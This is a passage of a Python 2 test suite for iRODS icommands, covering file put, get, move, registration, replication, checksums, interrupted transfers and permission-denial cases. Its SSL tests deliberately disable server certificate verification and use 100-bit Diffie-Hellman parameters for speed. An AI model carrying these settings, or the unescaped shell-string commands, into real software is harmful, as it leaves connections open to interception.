self.testgroup = s.testgroup
print "run_resource_setup - END"
def run_resource_teardown(self):
print "run_resource_teardown - BEGIN"
# local file cleanup
print "run_resource_teardown - removing local testfile"
os.unlink(self.testfile)
# remove grid test files
print "run_resource_teardown - removing testfile from grid public directory"
s.adminsession.runCmd('icd')
s.adminsession.runCmd('irm', [self.testfile, "../public/" + self.testfile])
# remove any bundle files
print "run_resource_teardown - removing any bundle files"
s.adminsession.runCmd('irm -rf ../../bundle')
# tear down admin session files
print "run_resource_teardown - admin session removing session files"
s.adminsession.runCmd('irm', ['-r', s.adminsession.sessionId])
# clean trash
print "run_resource_teardown - clean trash"
s.adminsession.runCmd('irmtrash', ['-M'])
# remove resc
print "run_resource_teardown - removing test resources"
s.adminsession.runAdminCmd('iadmin', ['rmresc', self.testresc])
s.adminsession.runAdminCmd('iadmin', ['rmresc', self.anotherresc])
# tear down resource itself
print "run_resource_teardown - tearing down actual resource"
for i in self.my_test_resource["teardown"]:
parameters = shlex.split(i) # preserves quoted substrings
if parameters[0] == "iadmin":
print s.adminsession.runAdminCmd(parameters[0], parameters[1:])
else:
output = commands.getstatusoutput(" ".join(parameters))
print output
print "run_resource_teardown - END"
class ShortAndSuite(ResourceBase):
def __init__(self):
print "in ShortAndSuite.__init__"
ResourceBase.__init__(self)
def test_awesome(self):
print "AWESOME!"
def test_local_iget(self):
print self.testfile
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
class ResourceSuite(ResourceBase):
'''Define the tests to be run for a resource type.
This class is designed to be used as a base class by developers
when they write tests for their own resource plugins.
All these tests will be inherited and the developer can add
any new tests for new functionality or replace any tests
they need to modify.
'''
def __init__(self):
print "in ResourceSuite.__init__"
ResourceBase.__init__(self)
###################
# iget
###################
def test_local_iget(self):
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
def test_local_iget_with_overwrite(self):
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
assertiCmdFail(s.adminsession, "iget " + self.testfile + " " + localfile) # already exists
assertiCmd(s.adminsession, "iget -f " + self.testfile + " " + localfile) # already exists, so force
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
def test_local_iget_with_bad_option(self):
# assertions
assertiCmdFail(s.adminsession, "iget -z") # run iget with bad option
def test_iget_with_purgec(self):
# local setup
filename = "purgecgetfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "iget -f --purgec " + filename) # get file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed only once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
###################
# imv
###################
def test_local_imv(self):
# local setup
movedfile = "moved_file.txt"
# assertions
assertiCmd(s.adminsession, "imv " + self.testfile + " " + movedfile) # move
assertiCmd(s.adminsession, "ils -L " + movedfile, "LIST", movedfile) # should be listed
# local cleanup
def test_local_imv_to_directory(self):
# local setup
# assertions
assertiCmd(s.adminsession, "imv " + self.testfile + " " + self.testdir) # move
assertiCmd(s.adminsession, "ils -L " + self.testdir, "LIST", self.testfile) # should be listed
# local cleanup
def test_local_imv_to_existing_filename(self):
# local setup
copyfile = "anotherfile.txt"
# assertions
assertiCmd(s.adminsession, "icp " + self.testfile + " " + copyfile) # icp
# cannot overwrite existing file
assertiCmd(s.adminsession, "imv " + self.testfile + " " + copyfile, "ERROR", "CAT_NAME_EXISTS_AS_DATAOBJ")
# local cleanup
###################
# iphymv
###################
def test_iphymv_to_nonexistent_resource(self):
assertiCmd(s.adminsession, "ils -L", "STDOUT", self.testfile) # debug
assertiCmd(s.adminsession, "iphymv -R nonexistentresc " + self.testfile,
"STDERR", "SYS_RESC_DOES_NOT_EXIST") # should fail
assertiCmd(s.adminsession, "ils -L", "STDOUT", self.testfile) # debug
###################
# iput
###################
def test_ssl_iput_with_rods_env(self):
# set up client and server side for ssl handshake
# server side certificate setup
os.system("openssl genrsa -out server.key 2> /dev/null")
os.system("openssl req -batch -new -key server.key -out server.csr")
os.system("openssl req -batch -new -x509 -key server.key -out server.crt -days 365")
os.system("mv server.crt chain.pem")
# normally 2048, but smaller size here for speed
os.system("openssl dhparam -2 -out dhparams.pem 100 2> /dev/null")
# add client irodsEnv settings
clientEnvFile = s.adminsession.sessionDir + "/irods_environment.json"
os.system("cp %s %sOrig" % (clientEnvFile, clientEnvFile))
env = {}
env['irods_client_server_policy'] = 'CS_NEG_REQUIRE'
env['irods_ssl_certificate_chain_file'] = get_irods_top_level_dir() + "/tests/pydevtest/chain.pem"
env['irods_ssl_certificate_key_file'] = get_irods_top_level_dir() + "/tests/pydevtest/server.key"
env['irods_ssl_dh_params_file'] = get_irods_top_level_dir() + "/tests/pydevtest/dhparams.pem"
env['irods_ssl_verify_server'] = "none"
mod_json_file(clientEnvFile, env)
# server needs the environment variable to
# read the correctly changed environment
# server reboot to pick up new irodsEnv settings
env_val = s.adminsession.sessionDir + "/irods_environment.json"
sys_cmd = "export IRODS_ENVIRONMENT_FILE=" + env_val + ";" + \
get_irods_top_level_dir() + "/iRODS/irodsctl restart"
os.system(sys_cmd)
# do the encrypted put
filename = "encryptedfile.txt"
filepath = create_local_testfile(filename)
assertiCmd(s.adminsession, "iinit rods") # reinitialize
# small file
assertiCmd(s.adminsession, "iput " + filename) # encrypted put - small file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # should be listed
# reset client environment to not require SSL
os.system("mv %sOrig %s" % (clientEnvFile, clientEnvFile))
# clean up
os.system("rm server.key server.csr chain.pem dhparams.pem")
os.remove(filename)
def test_ssl_iput_small_and_large_files(self):
# set up client and server side for ssl handshake
# server side certificate setup
os.system("openssl genrsa -out server.key 2> /dev/null")
os.system("openssl req -batch -new -key server.key -out server.csr")
os.system("openssl req -batch -new -x509 -key server.key -out server.crt -days 365")
os.system("mv server.crt chain.pem")
# normally 2048, but smaller size here for speed
os.system("openssl dhparam -2 -out dhparams.pem 100 2> /dev/null")
# server side environment variables
os.environ['irodsSSLCertificateChainFile'] = get_irods_top_level_dir() + "/tests/pydevtest/chain.pem"
os.environ['irodsSSLCertificateKeyFile'] = get_irods_top_level_dir() + "/tests/pydevtest/server.key"
os.environ['irodsSSLDHParamsFile'] = get_irods_top_level_dir() + "/tests/pydevtest/dhparams.pem"
# client side environment variables
os.environ['irodsSSLVerifyServer'] = "none"
# add client irodsEnv settings
clientEnvFile = s.adminsession.sessionDir + "/irods_environment.json"
os.system("cp %s %sOrig" % (clientEnvFile, clientEnvFile))
env = {}
env['irods_client_server_policy'] = 'CS_NEG_REQUIRE'
mod_json_file(clientEnvFile, env)
# server reboot to pick up new irodsEnv settings
os.system(get_irods_top_level_dir() + "/iRODS/irodsctl restart")
# do the encrypted put
filename = "encryptedfile.txt"
filepath = create_local_testfile(filename)
assertiCmd(s.adminsession, "iinit rods") # reinitialize
# small file
assertiCmd(s.adminsession, "iput " + filename) # encrypted put - small file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # should be listed
# large file
largefilename = "BIGencryptedfile.txt"
output = commands.getstatusoutput('dd if=/dev/zero of=' + largefilename + ' bs=1M count=60')
assert output[0] == 0, "dd did not successfully exit"
#os.system("ls -al "+largefilename)
assertiCmd(s.adminsession, "iput " + largefilename) # encrypted put - large file
assertiCmd(s.adminsession, "ils -L " + largefilename, "LIST", largefilename) # should be listed
# reset client environment to not require SSL
os.system("mv %sOrig %s" % (clientEnvFile, clientEnvFile))
# clean up
os.system("rm server.key server.csr chain.pem dhparams.pem")
os.remove(filename)
os.remove(largefilename)
@unittest.skipIf(psutil.disk_usage('/').free < 20000000000, "not enough free space for 5 x 2.3GB file ( local + iput + 3 repl children )")
def test_local_iput_with_really_big_file__ticket_1623(self):
# regression test against ticket [#1623]
# bigfilesize = [2287636992] is just under 'int' threshold
# bigfilesize = [2297714688] is just big enough to trip 'int' size error buffers
# local setup
big = "reallybigfile.txt"
bigger = "tmp.txt"
f = open(big, 'wb')
f.write("skjfhrq274fkjhvifqp92348fuho3uigho4iulqf2h3foq3i47fuhqof9q834fyhoq3iufhq34f8923fhoq348fhurferfwheere")
f.write("skjfhrq274fkjhvifqp92348fuho3uigho4iulqf2h3foq3i47fuhqof9q834fyhoq3iufhq34f8923fhoq348fhurferfwheere")
f.write("skjfhrq274fkjhvg34eere----2")
f.close()
for i in range(9):
commands.getstatusoutput(
"cat " + big + " " + big + " " + big + " " + big + " " + big + " " + big + " > " + bigger)
os.rename(bigger, big)
datafilename = big
# assertions
print "bigfilesize = [" + str(os.stat(datafilename).st_size) + "]"
# should not be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "ERROR", [datafilename, "does not exist"])
assertiCmd(s.adminsession, "iput " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput(self):
'''also needs to count and confirm number of replicas after the put'''
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should not be listed
assertiCmd(s.adminsession, "iput " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_overwrite(self):
assertiCmdFail(s.adminsession, "iput " + self.testfile) # fail, already exists
assertiCmd(s.adminsession, "iput -f " + self.testfile) # iput again, force
def test_local_iput_recursive(self):
recursivedirname = "dir"
def test_local_iput_lower_checksum(self):
# local setup
datafilename = "newfile.txt"
with open(datafilename, 'wb') as f:
f.write("TESTFILE -- [" + datafilename + "]")
# assertions
assertiCmd(s.adminsession, "iput -k " + datafilename) # iput
with open(datafilename) as f:
checksum = hashlib.sha256(f.read()).digest().encode("base64").strip()
assertiCmd(s.adminsession, "ils -L", "LIST", "sha2:" + checksum) # check proper checksum
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_upper_checksum(self):
# local setup
datafilename = "newfile.txt"
with open(datafilename, 'wb') as f:
f.write("TESTFILE -- [" + datafilename + "]")
# assertions
assertiCmd(s.adminsession, "iput -K " + datafilename) # iput
with open(datafilename) as f:
checksum = hashlib.sha256(f.read()).digest().encode("base64").strip()
assertiCmd(s.adminsession, "ils -L", "LIST", "sha2:" + checksum) # check proper checksum
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_onto_specific_resource(self):
# local setup
datafilename = "anotherfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should not be listed
assertiCmd(s.adminsession, "iput -R " + self.testresc + " " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", self.testresc) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_interrupt_directory(self):
# local setup
datadir = "newdatadir"
output = commands.getstatusoutput('mkdir ' + datadir)
datafiles = ["file1", "file2", "file3", "file4", "file5", "file6", "file7"]
for datafilename in datafiles:
print "-------------------"
print "creating " + datafilename + "..."
localpath = datadir + "/" + datafilename
output = commands.getstatusoutput('dd if=/dev/zero of=' + localpath + ' bs=1M count=20')
print output[1]
assert output[0] == 0, "dd did not successfully exit"
rf = "collectionrestartfile"
# assertions
iputcmd = "iput -X " + rf + " -r " + datadir
if os.path.exists(rf):
os.unlink(rf)
interruptiCmd(s.adminsession, iputcmd, rf, 10) # once restartfile reaches 10 bytes
assert os.path.exists(rf), rf + " should now exist, but did not"
output = commands.getstatusoutput('cat ' + rf)
print " restartfile [" + rf + "] contents --> [" + output[1] + "]"
assertiCmd(s.adminsession, "ils -L " + datadir, "LIST", datadir) # just to show contents
assertiCmd(s.adminsession, iputcmd, "LIST", "File last completed") # confirm the restart
for datafilename in datafiles:
assertiCmd(s.adminsession, "ils -L " + datadir, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm -rf ' + datadir)
output = commands.getstatusoutput('rm ' + rf)
def test_local_iput_interrupt_largefile(self):
# local setup
datafilename = "bigfile"
print "-------------------"
print "creating " + datafilename + "..."
output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=150')
print output[1]
assert output[0] == 0, "dd did not successfully exit"
rf = "bigrestartfile"
# assertions
iputcmd = "iput --lfrestart " + rf + " " + datafilename
if os.path.exists(rf):
os.unlink(rf)
interruptiCmd(s.adminsession, iputcmd, rf, 10) # once restartfile reaches 10 bytes
time.sleep(2) # wait for all interrupted threads to exit
assert os.path.exists(rf), rf + " should now exist, but did not"
output = commands.getstatusoutput('cat ' + rf)
print " restartfile [" + rf + "] contents --> [" + output[1] + "]"
today = datetime.date.today()
# length should not be zero
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", [" 0 " + today.isoformat(), datafilename])
# confirm the restart
assertiCmd(s.adminsession, iputcmd, "LIST", datafilename + " was restarted successfully")
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST",
[" " + str(os.stat(datafilename).st_size) + " " + today.isoformat(), datafilename]) # length should be size on disk
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
output = commands.getstatusoutput('rm ' + rf)
def test_local_iput_physicalpath_no_permission(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "iput -p /newfileinroot.txt " + datafilename, "ERROR",
["UNIX_FILE_CREATE_ERR", "Permission denied"]) # should fail to write
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_physicalpath(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
fullpath = get_irods_top_level_dir() + "/newphysicalpath.txt"
assertiCmd(s.adminsession, "iput -p " + fullpath + " " + datafilename) # should complete
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", fullpath) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_admin_local_iput_relative_physicalpath_into_server_bin(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
relpath = "relativephysicalpath.txt"
# should disallow relative path
assertiCmd(s.adminsession, "iput -p " + relpath + " " + datafilename, "ERROR", "absolute")
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_relative_physicalpath_into_server_bin(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
relpath = "relativephysicalpath.txt"
assertiCmd(s.sessions[1], "iput -p " + relpath + " " + datafilename, "ERROR", "absolute") # should error
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_with_changed_target_filename(self):
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
changedfilename = "different.txt"
assertiCmd(s.adminsession, "iput " + datafilename + " " + changedfilename) # should complete
assertiCmd(s.adminsession, "ils -L " + changedfilename, "LIST", changedfilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
@unittest.skip("TODO: revisit later, this is causing issues with mysql")
def test_local_iput_collision_with_wlock(self):
# local setup
datafilename = "collisionfile1.txt"
print "-------------------"
print "creating " + datafilename + "..."
output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=30')
print output[1]
assert output[0] == 0, "dd did not successfully exit"
# assertions
begin = time.time()
errorflag = False
procs = set()
pids = set()
# start multiple icommands in parallel
initialdelay = 3 # seconds
for i in range(5):
if i == 0:
# add a three second delay before the first icommand
p = s.adminsession.runCmd(
'iput', ["-vf", "--wlock", datafilename], waitforresult=False, delay=initialdelay)
else:
p = s.adminsession.runCmd('iput', ["-vf", "--wlock", datafilename], waitforresult=False, delay=0)
procs.add(p)
pids.add(p.pid)
while pids:
pid, retval = os.wait()
for proc in procs:
if proc.pid == pid:
print "pid " + str(pid) + ":"
if retval != 0:
print " * ERROR occurred * <------------"
errorflag = True
print " retval [" + str(retval) + "]"
print " stdout [" + proc.stdout.read().strip() + "]"
print " stderr [" + proc.stderr.read().strip() + "]"
pids.remove(pid)
elapsed = time.time() - begin
print "\ntotal time [" + str(elapsed) + "]"
assert elapsed > initialdelay
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
assert errorflag == False, "oops, had an error"
@unittest.skip("TODO: revisit later, not sure this is testing anything of interest")
def test_local_iput_collision_without_wlock(self):
# local setup
datafilename = "collisionfile2.txt"
print "-------------------"
print "creating " + datafilename + "..."
output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=30')
print output[1]
assert output[0] == 0, "dd did not successfully exit"
# assertions
begin = time.time()
errorflag = False
procs = set()
pids = set()
# start multiple icommands in parallel
initialdelay = 3 # seconds
for i in range(7):
if i == 0:
# add a three second delay before the first icommand
p = s.adminsession.runCmd('iput', ["-vf", datafilename], waitforresult=False, delay=initialdelay)
else:
p = s.adminsession.runCmd('iput', ["-vf", datafilename], waitforresult=False, delay=0)
procs.add(p)
pids.add(p.pid)
while pids:
pid, retval = os.wait()
for proc in procs:
if proc.pid == pid:
print "pid " + str(pid) + ":"
if retval != 0:
errorflag = True
else:
print " * Unexpectedly, No ERROR occurred * <------------"
print " retval [" + str(retval) + "]"
print " stdout [" + proc.stdout.read().strip() + "]"
print " stderr [" + proc.stderr.read().strip() + "]"
pids.remove(pid)
elapsed = time.time() - begin
print "\ntotal time [" + str(elapsed) + "]"
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
assert errorflag == True, "Expected ERRORs did not occur"
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_iput_overwrite_others_file__ticket_2086(self):
# pre state
assertiCmd(s.adminsession, "ils -L", "LIST", self.testfile) # should be listed
# local setup
filename = "overwritefile.txt"
filepath = create_local_testfile(filename)
# alice tries to put
homepath = "/home/" + s.adminsession.getUserName() + "/" + s.adminsession.sessionId + "/" + self.testfile
logicalpath = "/" + s.adminsession.getZoneName() + homepath
assertiCmd(s.sessions[1], "iput " + filepath + " " + logicalpath, "ERROR", "CAT_NO_ACCESS_PERMISSION") # iput
# check physicalpaths (of all replicas)
cmdout = s.adminsession.runCmd('ils', ['-L'])
print "[ils -L]:"
print "[" + cmdout[0] + "]"
lines = cmdout[0].splitlines()
for l in cmdout[0].splitlines():
if "demoResc" in l:
if "/session-" in l:
physicalpath = l.split()[2]
# check file is on disk
print "[ls -l " + physicalpath + "]:"
os.system("ls -l " + physicalpath)
assert os.path.exists(physicalpath)
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_iput_with_purgec(self):
# local setup
filename = "purgecfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput --purgec " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed only once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_local_iput_with_force_and_destination_resource__ticket_1706(self):
# local setup
filename = "iputwithforceanddestination.txt"
filepath = create_local_testfile(filename)
doublefile = "doublefile.txt"
os.system("cat %s %s > %s" % (filename, filename, doublefile))
doublesize = str(os.stat(doublefile).st_size)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate to test resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)
# overwrite test repl with different data
assertiCmd(s.adminsession, "iput -f -R %s %s %s" % (self.testresc, doublefile, filename))
# default resource should have dirty copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + filename])
# default resource should not have doublesize file
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + doublesize + " ", " " + filename])
# targeted resource should have new double clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " " + doublesize + " ", "& " + filename])
# local cleanup
os.remove(filepath)
os.remove(doublefile)
###################
# ireg
###################
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsadmin(self):
# local setup
filename = "newfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "ireg " + filepath + " /" + s.adminsession.getZoneName() + "/home/" +
s.adminsession.getUserName() + "/" + s.adminsession.sessionId + "/" + filename) # ireg
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsuser(self):
# local setup
filename = "newfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.sessions[1], "ireg " + filepath + " /" + s.sessions[1].getZoneName() + "/home/" + s.sessions[
1].getUserName() + "/" + s.sessions[1].sessionId + "/" + filename, "ERROR", "PATH_REG_NOT_ALLOWED") # ireg
assertiCmdFail(s.sessions[1], "ils -L " + filename, "LIST", filename) # should not be listed
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsuser_in_vault(self):
# get vault base path
cmdout = s.sessions[1].runCmd('iquest', ["%s", "select RESC_VAULT_PATH where RESC_NAME = 'demoResc'"])
vaultpath = cmdout[0].rstrip('\n')
# make dir in vault if necessary
dir = os.path.join(vaultpath, 'home', s.sessions[1].getUserName())
if not os.path.exists(dir):
os.makedirs(dir)
# create file in vault
filename = "newfile.txt"
filepath = os.path.join(dir, filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.sessions[1], "ireg " + filepath + " /" + s.sessions[1].getZoneName() + "/home/" + s.sessions[
1].getUserName() + "/" + s.sessions[1].sessionId + "/" + filename, "ERROR", "PATH_REG_NOT_ALLOWED") # ireg
assertiCmdFail(s.sessions[1], "ils -L " + filename, "LIST", filename) # should not be listed
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
###################
# irepl
###################
def test_irepl_invalid_input(self):
# local setup
filename = "somefile.txt"
filepath = create_local_testfile(filename)
# assertions
# should not be listed
assertiCmd(s.adminsession, "ils -L " + filename, "STDERR", "does not exist")
assertiCmd(s.adminsession, "iput " + filename) # put file
# for debugging
assertiCmd(s.adminsession, "ils -L " + filename, "STDOUT", filename)
# replicate to bad resource
assertiCmd(s.adminsession, "irepl -R nonresc " + filename, "STDERR", "SYS_INVALID_INPUT_PARAM")
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
# local cleanup
os.remove(filepath)
def test_irepl_multithreaded(self):
# local setup
filename = "largefile.txt"
filepath = create_local_largefile(filename)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "STDERR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "STDOUT", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " -N 3 " + filename) # replicate to test resource
# test resource should be listed
assertiCmd(s.adminsession, "ils -l " + filename, "STDOUT", self.testresc)
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
# local cleanup
os.remove(filepath)
def test_irepl_update_replicas(self):
# local setup
filename = "updatereplicasfile.txt"
filepath = create_local_testfile(filename)
hostname = get_hostname()
doublefile = "doublefile.txt"
os.system("cat %s %s > %s" % (filename, filename, doublefile))
doublesize = str(os.stat(doublefile).st_size)
# assertions
assertiCmd(s.adminsession, "iadmin mkresc thirdresc unixfilesystem %s:/tmp/thirdrescVault" %
hostname, "LIST", "Creating") # create third resource
assertiCmd(s.adminsession, "iadmin mkresc fourthresc unixfilesystem %s:/tmp/fourthrescVault" %
hostname, "LIST", "Creating") # create fourth resource
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
# replicate to test resource
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)
# replicate to third resource
assertiCmd(s.adminsession, "irepl -R thirdresc " + filename)
# replicate to fourth resource
assertiCmd(s.adminsession, "irepl -R fourthresc " + filename)
# repave overtop test resource
assertiCmd(s.adminsession, "iput -f -R " + self.testresc + " " + doublefile + " " + filename)
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
assertiCmd(s.adminsession, "irepl -U " + filename) # update last replica
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
assertiCmd(s.adminsession, "irepl -aU " + filename) # update all replicas
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
assertiCmd(s.adminsession, "iadmin rmresc thirdresc") # remove third resource
assertiCmd(s.adminsession, "iadmin rmresc fourthresc") # remove third resource
# local cleanup
os.remove(filepath)
os.remove(doublefile)
def test_irepl_over_existing_second_replica__ticket_1705(self):
# local setup
filename = "secondreplicatest.txt"
filepath = create_local_testfile(filename)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput -R " + self.testresc + " " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl " + filename) # replicate to default resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl " + filename) # replicate overtop default resource
# should not have a replica 2
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate overtop test resource
# should not have a replica 2
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# local cleanup
os.remove(filepath)
def test_irepl_over_existing_third_replica__ticket_1705(self):
# local setup
filename = "thirdreplicatest.txt"
filepath = create_local_testfile(filename)
hostname = get_hostname()
# assertions
assertiCmd(s.adminsession, "iadmin mkresc thirdresc unixfilesystem %s:/tmp/thirdrescVault" %
hostname, "LIST", "Creating") # create third resource
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
